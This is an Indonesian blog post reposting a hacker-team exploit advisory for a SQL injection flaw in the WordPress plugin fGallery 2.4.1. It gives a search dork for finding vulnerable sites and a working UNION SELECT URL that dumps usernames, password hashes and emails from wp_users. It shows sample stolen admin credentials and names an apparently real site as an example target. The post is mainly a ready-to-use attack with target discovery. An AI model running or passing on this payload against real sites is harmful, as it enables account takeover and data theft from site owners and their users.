Selasa, 02 Februari 2010

Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability

PHP
--------------------------------------------------------------
Indonesian Hacker Team a.k.a IH Team
--------------------------------------------------------------
# Author : Kimmo
# Site : www.indonesianhacker.org
# Script : Wordpress Plugin fGallery 2.4.1
# BUG : Remote SQL Injection Vulnerability
# Dork : inurl:/wp-content/plugins/fgallery/

## Vulnerable CODE :
~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~

$cat = $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]");
$images = $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit :
[Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

Exemple :
http://site.il/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

src='http://site.il/wordpress/wp-content/fgallery/thumb_admin:051e3db4c8eee42d7c93df48dffe4d5f:name@provider.com' />
5
name@provider.com Thu, 01 Jan 1970 00:00:00 +0100

Info => admin:051e3db4c8eee42d7c93df48dffe4d5f:name@provider.com

admin login http://target.il/wordpress_path/wp/wp-login.php
===============================================================================

Contoh :
http://www.whs-edu.com/wp-content/plugins/fgallery/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

===============================================================================

Tidak ada komentar:

Posting Komentar